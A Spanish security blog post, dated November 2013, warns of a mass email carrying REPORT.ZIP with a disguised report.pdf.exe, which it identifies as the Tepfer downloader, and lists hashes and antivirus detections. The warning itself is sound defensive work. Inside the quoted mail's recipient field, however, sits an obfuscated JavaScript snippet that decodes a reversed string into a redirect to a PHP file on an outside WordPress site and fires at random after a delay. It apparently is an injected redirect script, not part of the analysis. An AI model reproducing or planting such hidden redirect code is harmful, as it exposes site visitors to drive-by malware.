MAIL MASIVO QUE SE ESTA RECIBIENDO CON FICHERO ANEXADO MALICIOSO (TEPFER DLDR)

Se está recibiendo este mail anexando fichero REPORT.ZIP que contiene un fichero del mismo nombre con doble extension .PDF.EXE , con icono típico de PDF
El texto del mail es el siguiente:
_________________________________

Asunto: Wells Fargo Advisors
De: “WELLS FARGO” <tokreditbank.ru”>office@autokreditbank.ru>
Fecha: 12/11/2013 13:34
Para: <$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:John_Deen@wellsfargo.com”>John_Deen@wellsfargo.com

Investments in securities and insurance products are:
NOT FDIC-INSURED/NO BANK-GUARANTEES/MAY LOSE VALUE Wells Fargo Advisors, LLC is a nonbank affiliate of Wells Fargo & Company, Member FINRA/SIPC.
1 North Jefferson, St. Louis, MO 63103

CONFIDENTIAL NOTICE: The contents of this message, including any attachments, are confidential and are intended solely for the use of the person or entity to whom the message was addressed. If you are not the intended recipient of this message, please be advised that any dissemination, distribution, or use of the contents of this message is strictly prohibited. If you received this message in error, please notify the sender. Please also permanently delete all copies of the original message and any attached documentation. Thank you.
______________________
fin del mail malicioso

A partir del ELISTARA 28.75 de hoy pasamos a controlarlo como downloader TEPFER

El preanalisis del fichero anexado subido al virustotal, ofrece el siguiente informe:

MD5 a4303e990f9afe25f0d3055266cff3b7
SHA1 100582393cc6df00dfcc003de535c09eca5dde4a
File size 33.5 KB ( 34304 bytes )
SHA256: 64ad0e3952f06ac1bdaa189406538b972727c314463d24430fcd5c50170365ca
Nombre: report.pdf.exe
Detecciones: 9 / 47
Fecha de análisis: 2013-11-12 14:36:00 UTC ( hace 0 minutos )

0 1 Análisis File detail Información adicional Comentarios Votos
Antivirus  Resultado  Actualización
Agnitum   20131111
AhnLab-V3   20131112
AntiVir  TR/Crypt.XPACK.Gen3  20131112
Antiy-AVL   20131112
Avast  Win32:Malware-gen  20131112
AVG   20131112
Baidu-International   20131112
BitDefender   20131112
Bkav   20131112
ByteHero   20131111
CAT-QuickHeal   20131112
ClamAV   20131112
Commtouch   20131112
Comodo   20131112
DrWeb   20131112
Emsisoft   20131112
ESET-NOD32  Win32/Wigon.PH  20131112
F-Prot   20131112
F-Secure   20131112
Fortinet  W32/Small.ABS!tr  20131112
GData   20131112
Ikarus  Trojan-PWS.Fareit  20131112
Jiangmin   20131112
K7AntiVirus   20131111
K7GW   20131111
Kaspersky  Trojan.Win32.Badur.eisf  20131112
Kingsoft   20130829
Malwarebytes   20131112
McAfee   20131112
McAfee-GW-Edition   20131111
Microsoft   20131112
MicroWorld-eScan   20131112
NANO-Antivirus   20131111
Norman   20131112
nProtect   20131112
Panda   20131111
Rising   20131112
Sophos  Troj/Zbot-GUM  20131112
SUPERAntiSpyware   20131112
Symantec  Downloader  20131112
TheHacker   20131112
TotalDefense   20131111
TrendMicro   20131112
TrendMicro-HouseCall  TROJ_GEN.F0D1H00KC13  20131112
VBA32   20131112
VIPRE   20131112
ViRobot   20131112

Dicha version del ELISTARA 28.75 que lo detecta y elimina, estará disponible en nuestra web a partir de las 19 h CEST de hoy

saludos

ms, 12-11-2013

__________

NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________

Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.

Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.

Los comentarios están cerrados.

 

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información.

ACEPTAR
Aviso de cookies